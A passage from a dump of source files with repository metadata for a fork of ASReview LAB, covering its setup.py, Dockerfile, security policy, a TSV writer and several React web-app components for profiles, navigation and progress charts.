WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# based on https://github.com/pypa/sampleproject - MIT License\n\n# Always prefer setuptools over distutils\nimport platform\nimport re\nimport subprocess\nimport sys\nfrom io import open\nfrom os import path\nfrom pathlib import Path\n\nfrom setuptools import Command\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nimport versioneer\n\n\ndef get_long_description():\n \"\"\"Get project description based on README.\"\"\"\n here = path.abspath(path.dirname(__file__))\n\n # Get the long description from the README file\n with open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\n # remove emoji\n long_description = re.sub(r\"\\:[a-z_]+\\:\", \"\", long_description)\n\n return long_description\n\n\nREQUIRES = [\n \"numpy\",\n \"pandas>=1,<3\",\n \"scikit-learn\",\n \"rispy~=0.7.0\",\n \"xlrd>=1.0.0\",\n \"setuptools\",\n \"flask>=2.3.0\",\n \"flask_cors\",\n \"flask-login\",\n \"flask-mail\",\n \"openpyxl\",\n \"jsonschema\",\n \"filelock\",\n \"Flask-SQLAlchemy>=3.0.2\",\n \"requests\",\n \"tqdm\",\n \"gevent>=20\",\n \"datahugger>=0.2\",\n \"synergy_dataset\"\n]\n\nif sys.version_info < (3, 11):\n REQUIRES += [\"tomli\"]\n\n\nif sys.version_info < (3, 10):\n REQUIRES += [\"importlib_metadata>=3.6\"]\n\n\nDEPS = {\n \"sbert\": [\"sentence_transformers\"],\n \"doc2vec\": 
[\"gensim\"],\n \"tensorflow\": [\"tensorflow~=2.0\"],\n \"dev\": [\"black\", \"check-manifest\", \"flake8\", \"flake8-isort\", \"isort\"],\n \"test\": [\"coverage\", \"pytest\", \"pytest-random-order\"],\n}\nDEPS[\"all\"] = DEPS[\"sbert\"] + DEPS[\"doc2vec\"]\nDEPS[\"all\"] += DEPS[\"tensorflow\"]\n\n\nclass CompileAssets(Command):\n \"\"\"\n Compile and build the frontend assets using npm and webpack.\n\n Registered as cmdclass in setup() so it can be called with\n ``python setup.py compile_assets``.\n \"\"\"\n\n description = \"Compile and build the frontend assets\"\n user_options = []\n\n def initialize_options(self):\n \"\"\"Set default values for options.\"\"\"\n\n def finalize_options(self):\n \"\"\"Set final values for options.\"\"\"\n\n def run(self):\n \"\"\"Run a command to compile and build assets.\"\"\"\n\n path_webapp = Path(__file__).parent / \"asreview\" / \"webapp\"\n\n subprocess.check_call(\n [\"npm\", \"install\"],\n cwd=str(path_webapp),\n shell=(platform.system() == \"Windows\")\n )\n subprocess.check_call(\n [\"npm\", \"run-script\", \"build\"],\n cwd=str(path_webapp),\n shell=(platform.system() == 'Windows')\n )\n\n\ndef get_cmdclass():\n cmdclass = versioneer.get_cmdclass()\n cmdclass[\"compile_assets\"] = CompileAssets\n return cmdclass\n\n\nsetup(\n name=\"asreview\",\n version=versioneer.get_version(),\n cmdclass=get_cmdclass(),\n description=\"ASReview LAB - A tool for AI-assisted systematic reviews\",\n long_description=get_long_description(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/asreview/asreview\",\n author=\"ASReview LAB developers\",\n author_email=\"[email protected]\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Text Processing :: General\",\n \"Framework :: Flask\",\n ],\n keywords=[\"systematic review\", \"machine-learning\"],\n packages=find_packages(exclude=[\"contrib\", \"docs\", \"tests\"]),\n package_data={\n \"asreview\": [\n \"webapp/build/*\",\n \"webapp/build/static/*/*\",\n ]\n },\n python_requires=\"~=3.8\",\n install_requires=REQUIRES,\n extras_require=DEPS,\n entry_points={\n \"console_scripts\": [\n \"asreview=asreview.__main__:main\",\n ],\n \"asreview.entry_points\": [\n \"lab=asreview.entry_points:LABEntryPoint\",\n \"web_run_model=asreview.entry_points:WebRunModelEntryPoint\",\n \"simulate=asreview.entry_points:SimulateEntryPoint\",\n \"algorithms=asreview.entry_points:AlgorithmsEntryPoint\",\n \"state-inspect=asreview.entry_points:StateInspectEntryPoint\",\n \"auth-tool=asreview.entry_points:AuthTool\",\n ],\n \"asreview.readers\": [\n \".csv = asreview.io:CSVReader\",\n \".tab = asreview.io:CSVReader\",\n \".tsv = asreview.io:CSVReader\",\n \".ris = asreview.io:RISReader\",\n \".txt = asreview.io:RISReader\",\n \".xlsx = asreview.io:ExcelReader\",\n ],\n \"asreview.writers\": [\n \".csv = asreview.io:CSVWriter\",\n \".tab = asreview.io:TSVWriter\",\n \".tsv = asreview.io:TSVWriter\",\n \".ris = asreview.io:RISWriter\",\n \".txt = asreview.io:RISWriter\",\n \".xlsx = asreview.io:ExcelWriter\",\n ],\n \"asreview.datasets\": [\n \"benchmark = 
asreview.datasets:BenchmarkDataGroup\",\n \"benchmark-nature = asreview.datasets:NaturePublicationDataGroup\",\n \"synergy = asreview.datasets:SynergyDataGroup\"\n ],\n \"asreview.models.classifiers\": [\n \"svm = asreview.models.classifiers:SVMClassifier\",\n \"nb = asreview.models.classifiers:NaiveBayesClassifier\",\n \"rf = asreview.models.classifiers:RandomForestClassifier\",\n \"nn-2-layer = asreview.models.classifiers:NN2LayerClassifier\",\n \"logistic = asreview.models.classifiers:LogisticClassifier\",\n \"lstm-base = asreview.models.classifiers:LSTMBaseClassifier\",\n \"lstm-pool = asreview.models.classifiers:LSTMPoolClassifier\",\n ],\n \"asreview.models.feature_extraction\": [\n \"doc2vec = asreview.models.feature_extraction:Doc2Vec\",\n \"embedding-idf = asreview.models.feature_extraction:EmbeddingIdf\",\n \"embedding-lstm = asreview.models.feature_extraction:EmbeddingLSTM\",\n \"sbert = asreview.models.feature_extraction:SBERT\",\n \"tfidf = asreview.models.feature_extraction:Tfidf\",\n ],\n \"asreview.models.balance\": [\n \"simple = asreview.models.balance:SimpleBalance\",\n \"double = asreview.models.balance:DoubleBalance\",\n # \"triple = asreview.models.balance:TripleBalance\", # Broken, only via API\n \"undersample = asreview.models.balance:UndersampleBalance\",\n ],\n \"asreview.models.query\": [\n \"max = asreview.models.query.max:MaxQuery\",\n \"random = asreview.models.query.random:RandomQuery\",\n \"uncertainty = asreview.models.query.uncertainty:UncertaintyQuery\",\n \"cluster = asreview.models.query.cluster:ClusterQuery\",\n \"max_random = asreview.models.query.mixed:MaxRandomQuery\",\n \"max_uncertainty = asreview.models.query.mixed:MaxUncertaintyQuery\",\n ],\n },\n project_urls={\n \"Bug Reports\": \"https://github.com/asreview/asreview/issues\",\n \"Source\": \"https://github.com/asreview/asreview/\",\n },\n)\n" }, { "alpha_fraction": 0.7115384340286255, "alphanum_fraction": 0.7115384340286255, "avg_line_length": 51, "blob_id": "f0e0244070bffcee57c443904c52f2fe6030bbc7", "content_id": "20818fcaf61f47400c91b89181f1ca4db5b91113", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 52, "license_type": "permissive", "max_line_length": 51, "num_lines": 1, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/ModelComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as ModelForm } from \"./ModelForm\";\n" }, { "alpha_fraction": 0.6292714476585388, "alphanum_fraction": 0.637653112411499, "avg_line_length": 32, "blob_id": "a4cea6a471d6a1a8df93d09a27b95679d6b3caf1", "content_id": "adf474afeaeb31abab31afcc5f674741a86584b7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1551, "license_type": "permissive", "max_line_length": 74, "num_lines": 47, "path": "/asreview/io/tsv_writer.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nclass TSVWriter:\n \"\"\"TSV file writer.\"\"\"\n\n name = \"tsv\"\n label = \"TSV (UTF-8)\"\n write_format = \".tsv\"\n\n @classmethod\n def write_data(cls, df, fp, sep=\"\\t\", labels=None, ranking=None):\n \"\"\"Export dataset.\n\n Arguments\n ---------\n df: pandas.Dataframe\n Dataframe of all available record data.\n fp: str, NoneType\n Filepath or None for buffer.\n sep: str\n Seperator of the file.\n labels: list, numpy.ndarray\n Current labels will be overwritten by these labels\n (including unlabelled). No effect if labels is None.\n ranking: list\n Reorder the dataframe according to these (internal) indices.\n Default ordering if ranking is None.\n\n Returns\n -------\n TSV file\n Dataframe of all available record data.\n \"\"\"\n return df.to_csv(fp, sep=sep, index=True)\n" }, { "alpha_fraction": 0.5072187185287476, "alphanum_fraction": 0.5088891386985779, "avg_line_length": 30.272388458251953, "blob_id": "36e54372e29612483f6dc01b265ee96d7b77dac3", "content_id": "3b4459fae8a9157f49e8c4bd0dbdf42e118fd5cc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 8381, "license_type": "permissive", "max_line_length": 80, "num_lines": 268, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/ProfilePage.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { useNavigate, useSearchParams } from \"react-router-dom\";\nimport { useMutation, useQuery } from \"react-query\";\nimport DashboardPage from \"./DashboardPage\";\nimport {\n Box,\n Checkbox,\n FormControl,\n FormControlLabel,\n FormHelperText as FHT,\n Stack,\n TextField,\n Typography,\n} from \"@mui/material\";\n\nimport LoadingButton from \"@mui/lab/LoadingButton\";\nimport {\n TypographyH5Medium,\n TypographyH6Medium,\n} from \"../../StyledComponents/StyledTypography.js\";\nimport { InlineErrorHandler } from \"../../Components\";\nimport { useToggle } from \"../../hooks/useToggle\";\n\nimport { AuthAPI } from \"../../api\";\nimport { useFormik } from \"formik\";\nimport * as Yup from \"yup\";\n\n// VALIDATION SCHEMA\nconst SignupSchema = Yup.object().shape({\n email: Yup.string().email(\"Invalid email\").required(\"Email is required\"),\n name: Yup.string().required(\"Full name is required\"),\n affiliation: Yup.string()\n .min(2, \"Affiliation must be at least 2 characters long\")\n .nullable(),\n password: Yup.string().matches(\n /^(?=.*[A-Za-z])(?=.*\\d)(?=.*[@$!%*?&#])[A-Za-z\\d@$!%*?&#]{8,}$/,\n \"Use 8 or more characters with a mix of letters, numbers & symbols\",\n ),\n confirmPassword: Yup.string().oneOf(\n [Yup.ref(\"password\"), null],\n \"Passwords must match\",\n ),\n});\n\nconst ProfilePage = (props) => {\n const navigate = useNavigate();\n\n const [showPassword, toggleShowPassword] = useToggle();\n const [loadingSaveButton, setLoadingSaveButton] = React.useState(true);\n const [showPasswordFields, 
setShowPasswordFields] = React.useState(false);\n const [searchParams] = useSearchParams();\n const showFirstTimeMessage = searchParams.get(\"first_time\");\n\n const { error, isError, mutate } = useMutation(AuthAPI.updateProfile, {\n onSuccess: () => {\n navigate(\"/projects\");\n },\n });\n\n const handleSubmit = () => {\n if (formik.isValid) {\n mutate(formik.values);\n }\n };\n\n const initialValues = {\n email: \"\",\n name: \"\",\n affiliation: \"\",\n password: \"\",\n confirmPassword: \"\",\n publicAccount: true,\n };\n\n const formik = useFormik({\n initialValues: initialValues,\n validationSchema: SignupSchema,\n });\n\n const { data, isFetched } = useQuery(\"fetchProfileData\", AuthAPI.getProfile, {\n onSuccess: (data) => {\n formik.setFieldValue(\"email\", data.message.email, true);\n formik.setFieldValue(\"name\", data.message.name, true);\n formik.setFieldValue(\n \"affiliation\",\n data.message.affiliation || \"\",\n false,\n );\n formik.setFieldValue(\"public\", data.message.public || true);\n // show password field?\n if (data.message.origin === \"asreview\") {\n setShowPasswordFields(true);\n } else {\n setShowPasswordFields(false);\n }\n // stop spinner in button\n setLoadingSaveButton(false);\n },\n onError: (err) => {\n console.log(\"Did not fetch profile data from backend\", err);\n },\n });\n\n const returnType = () => {\n return !showPassword ? \"password\" : \"text\";\n };\n\n const renderPasswordFields = (formik) => {\n return (\n <>\n <FormControl>\n <Stack direction=\"row\" spacing={2}>\n <TextField\n id=\"password\"\n label=\"Change Password\"\n size=\"small\"\n fullWidth\n type={returnType()}\n value={formik.values.password}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n <TextField\n id=\"confirmPassword\"\n label=\"Confirm Password\"\n size=\"small\"\n fullWidth\n type={returnType()}\n value={formik.values.confirmPassword}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n </Stack>\n </FormControl>\n {formik.touched.password && formik.errors.password ? (\n <FHT error={true}>{formik.errors.password}</FHT>\n ) : null}\n {formik.touched.confirmPassword && formik.errors.confirmPassword ? (\n <FHT error={true}>{formik.errors.confirmPassword}</FHT>\n ) : null}\n <FormControl>\n <FormControlLabel\n control={\n <Checkbox\n id=\"public\"\n color=\"primary\"\n onChange={toggleShowPassword}\n />\n }\n label=\"Show password\"\n />\n </FormControl>\n </>\n );\n };\n\n return (\n <DashboardPage>\n {data && isFetched && (\n <>\n {/* Header */}\n <Box\n className=\"main-page-sticky-header-wrapper\"\n sx={{ background: (theme) => theme.palette.background.paper }}\n >\n <Box className=\"main-page-sticky-header with-button\">\n {!props.mobileScreen && (\n <TypographyH5Medium>Profile</TypographyH5Medium>\n )}\n {props.mobileScreen && (\n <Typography variant=\"h6\">Profile</Typography>\n )}\n <Stack direction=\"row\" spacing={1}>\n <span>\n <LoadingButton\n /*disabled={!formik.isValid}*/\n loading={loadingSaveButton}\n variant=\"contained\"\n onClick={handleSubmit}\n size={!props.mobileScreen ? 
\"medium\" : \"small\"}\n >\n Save\n </LoadingButton>\n </span>\n </Stack>\n </Box>\n </Box>\n\n {/* Page body */}\n <Box className=\"main-page-body-wrapper\">\n <Stack className=\"main-page-body\" direction={\"column\"} spacing={3}>\n {showFirstTimeMessage && (\n <TypographyH6Medium>\n Please take a second to review your profile data:\n </TypographyH6Medium>\n )}\n <TextField\n autoFocus\n id=\"email\"\n label=\"Email\"\n size=\"small\"\n fullWidth\n value={formik.values.email}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.email && formik.errors.email ? (\n <FHT error={true}>{formik.errors.email}</FHT>\n ) : null}\n <TextField\n id=\"name\"\n label=\"Full name\"\n size=\"small\"\n fullWidth\n value={formik.values.name}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.name && formik.errors.name ? (\n <FHT error={true}>{formik.errors.name}</FHT>\n ) : null}\n <TextField\n id=\"affiliation\"\n label=\"Affiliation\"\n size=\"small\"\n fullWidth\n value={formik.values.affiliation}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n {formik.touched.affiliation && formik.errors.affiliation ? (\n <FHT error={true}>{formik.errors.affiliation}</FHT>\n ) : null}\n {showPasswordFields && renderPasswordFields(formik)}\n {false && (\n <>\n <FormControlLabel\n control={\n <Checkbox\n color=\"primary\"\n id=\"publicAccount\"\n defaultChecked={formik.values.publicAccount}\n value={formik.values.publicAccount}\n onChange={formik.handleChange}\n onBlur={formik.handleBlur}\n />\n }\n label=\"Make this account public\"\n />\n <FHT>\n Making this account public allows you to collaborate.\n </FHT>\n </>\n )}\n {isError && (\n <FHT>\n <InlineErrorHandler message={error.message} />\n </FHT>\n )}\n </Stack>\n </Box>\n </>\n )}\n </DashboardPage>\n );\n};\n\nexport default ProfilePage;\n" }, { "alpha_fraction": 0.7892720103263855, "alphanum_fraction": 0.7969348430633545, "avg_line_length": 28, "blob_id": "bff04a40a2f7a423545a579265b176149b0f693c", "content_id": "7817475937668995cded34383540147d58f460de", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 261, "license_type": "permissive", "max_line_length": 94, "num_lines": 9, "path": "/SECURITY.md", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Security Policy\n\n## Supported Versions\n\nVersion 1 or later of ASReview LAB receives security updates. Version 0.x is not supported. 
\n\n## Reporting a Vulnerability\n\nPlease report vulnerabilities at https://github.com/asreview/asreview/security/advisories/new.\n" }, { "alpha_fraction": 0.5895061492919922, "alphanum_fraction": 0.5987654328346252, "avg_line_length": 26, "blob_id": "aea317a43e35ca45e5b73d1cb3504e35e6d5eb2e", "content_id": "b04f0a71a8a378a9ed3ad5ead210fc404e4892c3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 648, "license_type": "permissive", "max_line_length": 66, "num_lines": 24, "path": "/asreview/webapp/src/api/axiosErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "const axiosErrorHandler = (error) => {\n let api_error = {};\n\n if (error.response) {\n if (error.response.data[\"message\"]) {\n api_error[\"code\"] = error.response[\"status\"];\n api_error[\"message\"] = error.response.data[\"message\"];\n } else {\n api_error[\"code\"] = 500;\n api_error[\"message\"] = \"Whoops, something went wrong.\";\n }\n } else if (error.request) {\n api_error[\"code\"] = 503;\n api_error[\"message\"] =\n \"Failed to connect to server. Please restart the software.\";\n } else {\n api_error[\"message\"] = \"Unexpected error.\";\n console.log(error);\n }\n\n return api_error;\n};\n\nexport { axiosErrorHandler };\n" }, { "alpha_fraction": 0.5570297241210938, "alphanum_fraction": 0.5591697096824646, "avg_line_length": 27.150602340698242, "blob_id": "e3e8760172563304405d04e7b341abadcf0ae890", "content_id": "185d1222cb65926d5b03e286e0ce37a2ca6eeaeb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4673, "license_type": "permissive", "max_line_length": 86, "num_lines": 166, "path": "/asreview/webapp/src/Components/NavigationDrawer.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { connect } from \"react-redux\";\nimport { useNavigate, Outlet } from \"react-router-dom\";\nimport {\n Box,\n ButtonBase,\n CardMedia,\n Drawer,\n IconButton,\n Toolbar,\n} from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\nimport { Menu } from \"@mui/icons-material\";\n\nimport { DrawerItemContainer, Header } from \"../Components\";\n\nimport ASReviewLAB_black from \"../images/asreview_sub_logo_lab_black_transparent.svg\";\nimport ASReviewLAB_white from \"../images/asreview_sub_logo_lab_white_transparent.svg\";\nimport { drawerWidth } from \"../globals.js\";\nimport { toggleHelpDialog } from \"../redux/actions\";\n\nconst Root = styled(\"div\")(({ theme }) => ({}));\n\nconst mapDispatchToProps = (dispatch) => {\n return {\n toggleHelpDialog: () => {\n dispatch(toggleHelpDialog());\n },\n };\n};\n\nconst openedMixin = (theme) => ({\n width: drawerWidth,\n transition: theme.transitions.create(\"width\", {\n easing: theme.transitions.easing.sharp,\n duration: theme.transitions.duration.enteringScreen,\n }),\n overflowX: \"hidden\",\n});\n\nconst closedMixin = (theme) => ({\n transition: theme.transitions.create(\"width\", {\n easing: theme.transitions.easing.sharp,\n duration: theme.transitions.duration.leavingScreen,\n }),\n overflowX: \"hidden\",\n width: `calc(${theme.spacing(7)} + 1px)`,\n [theme.breakpoints.up(\"sm\")]: {\n width: `calc(${theme.spacing(9)} + 1px)`,\n },\n});\n\nconst NavigationRail = styled(Drawer, {\n shouldForwardProp: (prop) => prop !== \"open\",\n})(({ theme, open }) => ({\n width: drawerWidth,\n flexShrink: 0,\n whiteSpace: 
\"nowrap\",\n boxSizing: \"border-box\",\n ...(open && {\n ...openedMixin(theme),\n \"& .MuiDrawer-paper\": openedMixin(theme),\n }),\n ...(!open && {\n ...closedMixin(theme),\n \"& .MuiDrawer-paper\": closedMixin(theme),\n }),\n}));\n\nconst NavigationDrawer = (props) => {\n const { window } = props;\n const navigate = useNavigate();\n const theme = useTheme();\n\n const wordmarkState = () => {\n if (theme.palette.mode === \"dark\") {\n return ASReviewLAB_white;\n } else {\n return ASReviewLAB_black;\n }\n };\n\n const container =\n window !== undefined ? () => window().document.body : undefined;\n\n return (\n <Root>\n <Header toggleNavDrawer={props.toggleNavDrawer} />\n <Box\n component=\"nav\"\n aria-label=\"navigation drawer\"\n sx={{ width: { sm: drawerWidth }, flexShrink: { sm: 0 } }}\n >\n {/* Temporary drawer on mobile screen */}\n <Drawer\n container={container}\n variant=\"temporary\"\n open={props.mobileScreen && props.onNavDrawer}\n onClose={props.toggleNavDrawer}\n ModalProps={{\n keepMounted: true, // Better open performance on mobile.\n }}\n sx={{\n display: { xs: \"block\", md: \"none\" },\n \"& .MuiDrawer-paper\": {\n boxSizing: \"border-box\",\n width: drawerWidth,\n },\n }}\n >\n <Toolbar>\n <IconButton\n edge=\"start\"\n color=\"inherit\"\n onClick={props.toggleNavDrawer}\n size=\"large\"\n sx={{ marginRight: \"4px\" }}\n >\n <Menu />\n </IconButton>\n <ButtonBase disableRipple>\n <CardMedia\n component=\"img\"\n src={wordmarkState()}\n alt=\"ASReview LAB Dashboard\"\n onClick={() => {\n props.toggleNavDrawer();\n navigate(\"/\");\n }}\n sx={{ width: 130 }}\n />\n </ButtonBase>\n </Toolbar>\n <DrawerItemContainer\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n toggleSettings={props.toggleSettings}\n toggleHelpDialog={props.toggleHelpDialog}\n />\n </Drawer>\n\n {/* Permanent drawer on desktop screen */}\n <NavigationRail\n variant=\"permanent\"\n open={props.onNavDrawer}\n sx={{\n display: { xs: \"none\", md: \"block\" },\n }}\n >\n <Toolbar />\n <DrawerItemContainer\n mobileScreen={props.mobileScreen}\n onNavDrawer={props.onNavDrawer}\n toggleNavDrawer={props.toggleNavDrawer}\n toggleSettings={props.toggleSettings}\n toggleHelpDialog={props.toggleHelpDialog}\n />\n </NavigationRail>\n </Box>\n <Outlet />\n </Root>\n );\n};\n\nexport default connect(null, mapDispatchToProps)(NavigationDrawer);\n" }, { "alpha_fraction": 0.5506691932678223, "alphanum_fraction": 0.5544933080673218, "avg_line_length": 22.772727966308594, "blob_id": "e62ee2110661beda3307a16c5b8f8056eb8ba8b1", "content_id": "7fb911be2e421827fbe28860e11027b01d33a547", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 523, "license_type": "permissive", "max_line_length": 66, "num_lines": 22, "path": "/asreview/webapp/src/ProjectComponents/SelectItem.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Box, Typography } from \"@mui/material\";\n\nexport default function SelectItem(props) {\n return (\n <Box>\n <Typography className=\"typography-wrap\" variant=\"subtitle1\">\n {props.primary}\n </Typography>\n {props.secondary && (\n <Typography\n className=\"typography-wrap\"\n variant=\"body2\"\n gutterBottom\n sx={{ color: \"text.secondary\" }}\n >\n {props.secondary}\n </Typography>\n )}\n </Box>\n );\n}\n" }, { "alpha_fraction": 0.69486403465271, "alphanum_fraction": 0.7190332412719727, "avg_line_length": 
24.461538314819336, "blob_id": "44951f50bcc1444a1408bce0d2189787a5311ce5", "content_id": "60dbf5e964f262a1db2e80b5767e9a8f60d70662", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 662, "license_type": "permissive", "max_line_length": 98, "num_lines": 26, "path": "/Dockerfile", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# First stage\nFROM python:3.8-slim AS builder\nWORKDIR /app\n\n# Copy and build asreview\n# git is used by versioneer to define the project version\nCOPY . /app\nRUN apt-get update \\\n && apt-get install -y git npm \\\n && pip3 install --upgrade pip setuptools \\\n && python3 setup.py compile_assets \\\n && pip3 install --user . \\\n && pip3 install --user asreview-datatools asreview-insights asreview-makita asreview-wordcloud\n\n# Second stage\nFROM python:3.8-slim\nWORKDIR /app\n\nCOPY --from=builder /root/.local /root/.local\n\nENV ASREVIEW_HOST=0.0.0.0\nENV PATH=/root/.local/bin:$PATH\nENV ASREVIEW_PATH=/app/project_folder\nEXPOSE 5000\n\nENTRYPOINT [\"asreview\"]\n" }, { "alpha_fraction": 0.5116863250732422, "alphanum_fraction": 0.5273324251174927, "avg_line_length": 25.27918815612793, "blob_id": "e5d5e8b11feb001afbb56a3cd4f39553f84b2cad", "content_id": "af5ba818642159011db22aaf0a6e6b283e8f2f85", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5177, "license_type": "permissive", "max_line_length": 78, "num_lines": 197, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/ProgressChart.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport Chart from \"react-apexcharts\";\nimport { Card, CardContent } from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\n\nimport { projectModes } from \"../../globals\";\n\nconst PREFIX = \"ProgressChart\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n};\n\nconst StyledCard = styled(Card)(({ theme }) => ({\n borderRadius: 16,\n maxWidth: 960,\n overflow: \"visible\",\n width: \"100%\",\n [`& .${classes.root}`]: {\n paddingTop: 24,\n paddingLeft: 32,\n paddingRight: 32,\n },\n}));\n\nexport default function ProgressChart(props) {\n const theme = useTheme();\n\n const n_included = props.progressQuery.data\n ? props.progressQuery.data[\"n_included\"]\n : null;\n const n_excluded = props.progressQuery.data\n ? props.progressQuery.data[\"n_excluded\"]\n : null;\n const n_papers = props.progressQuery.data\n ? props.progressQuery.data[\"n_papers\"]\n : null;\n\n const formattedTotal = React.useCallback(() => {\n if (props.mode !== projectModes.SIMULATION || !props.isSimulating) {\n return n_papers ? 
n_papers.toLocaleString(\"en-US\") : 0;\n } else {\n return (\n Math.round(((n_included + n_excluded) / n_papers) * 10000) / 100 + \"%\"\n );\n }\n }, [props.isSimulating, props.mode, n_included, n_excluded, n_papers]);\n\n /**\n * Chart data array\n */\n const seriesArray = React.useCallback(() => {\n if (n_included && n_excluded && n_papers) {\n return [\n Math.round(((n_included + n_excluded) / n_papers) * 10000) / 100,\n Math.round((n_included / n_papers) * 10000) / 100,\n ];\n } else {\n return [];\n }\n }, [n_included, n_excluded, n_papers]);\n\n /**\n * Chart options\n */\n const optionsChart = React.useCallback(() => {\n return {\n chart: {\n animations: {\n enabled: false,\n },\n background: \"transparent\",\n id: \"ASReviewLABprogressChart\",\n type: \"radialBar\",\n },\n plotOptions: {\n radialBar: {\n hollow: {\n margin: 15,\n size: \"60%\",\n },\n dataLabels: {\n name: {\n fontSize: \"22px\",\n },\n value: {\n fontSize: !props.mobileScreen\n ? theme.typography.h5.fontSize\n : theme.typography.h6.fontSize,\n fontFamily: !props.mobileScreen\n ? theme.typography.h5.fontFamily\n : theme.typography.h6.fontFamily,\n fontWeight: theme.typography.fontWeightBold,\n },\n total: {\n show: true,\n label:\n props.mode !== projectModes.SIMULATION || !props.isSimulating\n ? \"Total records\"\n : \"Simulation progress\",\n fontSize: !props.mobileScreen\n ? theme.typography.subtitle1.fontSize\n : theme.typography.subtitle2.fontSize,\n fontFamily: !props.mobileScreen\n ? theme.typography.subtitle1.fontFamily\n : theme.typography.subtitle2.fontFamily,\n color: theme.palette.text.secondary,\n formatter: formattedTotal,\n },\n },\n },\n },\n colors: [\n theme.palette.mode === \"light\"\n ? theme.palette.secondary.light\n : theme.palette.secondary.main,\n theme.palette.mode === \"light\"\n ? theme.palette.primary.light\n : theme.palette.primary.main,\n ],\n dataLabels: {\n enabled: false,\n },\n labels: [\"Labeled\", \"Relevant\"],\n legend: {\n show: true,\n position: \"bottom\",\n fontSize: !props.mobileScreen ? 
\"14px\" : \"12px\",\n fontFamily: theme.typography.subtitle2.fontFamily,\n fontWeight: theme.typography.subtitle2.fontWeight,\n labels: {\n colors: theme.palette.text.secondary,\n },\n markers: {\n width: 8,\n height: 8,\n offsetX: -4,\n },\n itemMargin: {\n horizontal: 16,\n },\n },\n fill: {\n type: \"gradient\",\n gradient: {\n shade: \"light\",\n type: \"horizontal\",\n shadeIntensity: 0,\n inverseColors: true,\n opacityFrom: 0.7,\n opacityTo: 0.9,\n stops: [0, 100],\n },\n },\n markers: {\n size: 0,\n },\n noData: {\n text: \"No data available\",\n },\n stroke: {\n lineCap: \"round\",\n },\n theme: {\n mode: theme.palette.mode,\n },\n };\n }, [\n theme,\n formattedTotal,\n props.mobileScreen,\n props.mode,\n props.isSimulating,\n ]);\n\n const [series, setSeries] = React.useState(seriesArray());\n const [options, setOptions] = React.useState({});\n\n React.useEffect(() => {\n setSeries(seriesArray());\n setOptions(optionsChart());\n }, [seriesArray, optionsChart]);\n\n return (\n <StyledCard elevation={2}>\n <CardContent className={classes.root}>\n <Chart\n options={options}\n series={series}\n type=\"radialBar\"\n height={350}\n width=\"100%\"\n />\n </CardContent>\n </StyledCard>\n );\n}\n" }, { "alpha_fraction": 0.7528328895568848, "alphanum_fraction": 0.7528328895568848, "avg_line_length": 44.41935348510742, "blob_id": "bf014fc38b4703da4b307d580c24bba0a57963fe", "content_id": "2c53b06fb41ccdd93e53be4a831a93719fa4e864", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": 